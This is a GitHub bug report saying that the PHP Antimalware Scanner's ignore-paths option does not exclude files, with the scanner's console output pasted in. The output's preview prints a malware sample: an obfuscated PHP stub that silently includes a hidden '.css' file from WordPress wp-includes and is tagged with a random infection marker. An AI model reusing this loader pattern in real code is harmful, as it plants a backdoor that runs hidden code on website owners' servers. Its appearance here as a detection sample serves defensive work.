Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Ignore-path has no effect #116

Open
kepon85 opened this issue Nov 14, 2024 · 0 comments
Open

Ignore-path has no effect #116

kepon85 opened this issue Nov 14, 2024 · 0 comments

Comments

@kepon85
Copy link

kepon85 commented Nov 14, 2024

Hello

Version 0.14.0

It seems to me that the ignore(s)-path has no effect. Here's why I say that:

I would have thought that the files in "ignore path" were ignored but that doesn't seem to be the case. Of course I tried to put in unity, change the quotes, without wildard..

root@srvweb:~# mkdir /tmp/dirtest
root@srvweb:~# cp /opt/scripttest/test.php /tmp/dirtest/test.php
root@srvweb:~# php /opt/PHP-Antimalware-Scanner/scanner -l --ignore-paths="/tmp/dirtesttest.php,test.php,*test.php,/*test.php" /tmp/dirtest/

         █████╗ ███╗   ███╗██╗    ██╗███████╗ ██████╗ █████╗ ███╗   ██╗         
        ██╔══██╗████╗ ████║██║    ██║██╔════╝██╔════╝██╔══██╗████╗  ██║         
        ███████║██╔████╔██║██║ █╗ ██║███████╗██║     ███████║██╔██╗ ██║         
        ██╔══██║██║╚██╔╝██║██║███╗██║╚════██║██║     ██╔══██║██║╚██╗██║         
        ██║  ██║██║ ╚═╝ ██║╚███╔███╔╝███████║╚██████╗██║  ██║██║ ╚████║         
        ╚═╝  ╚═╝╚═╝     ╚═╝ ╚══╝╚══╝ ╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═══╝         
                                                                                
        Github: https://github.com/marcocesarato/PHP-Antimalware-Scanner        

                                 version 0.14.0                                 

                                                                                
                            PHP Antimalware Scanner                             
                           Created by Marco Cesarato                            
                                                                                

Agile mode enabled
Start scanning...
Scan date: 2024-11-14 16:21:00
Scanning /tmp/dirtest

Mapping and retrieving checksums, please wait...


Verifying files checksum...

[===============================] 100%  1/1 [0 sec/0 sec]

Found 1 files to check

Checking files...

[>                              ] 0%  0/1 [0 sec/0 sec]


PROBABLE MALWARE FOUND!
/tmp/dirtest/test.php

=================================== PREVIEW ====================================

  1 | <?php
  2 | /*92e78*/
  3 | 
  4 | $rdpnv0 = "/var/www/chute/web/wp\x2dincludes/blocks/post\x2daut\x68or\x2dbiograp\x68y/.5397785d.css"; if (!isset($rdpnv0)) {strrev ($rdpnv0);} else { @include_once /* 185 */ ($rdpnv0); }
  5 | 
  6 | /*92e78*/

================================================================================

Checksum: 675edd52709681efd3936bfec5887fc7
File path: /tmp/dirtest/test.php

Evil code found: 
[!] Exploit (infected_comment) [line 2]
    - Comments composed by 5 random chars usually used to detect if a file is infected yet
      => /*92e78*/

OPTIONS:

    [1] Delete file
    [2] Move to quarantine
    [3] Dry run evil code fixer
    [4] Dry run evil line code fixer
    [5] Open with vim
    [6] Open with nano
    [7] Add to whitelist
    [8] Show source
    [-] Ignore


amwscan > What is your choice?  

Thank's,
David

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant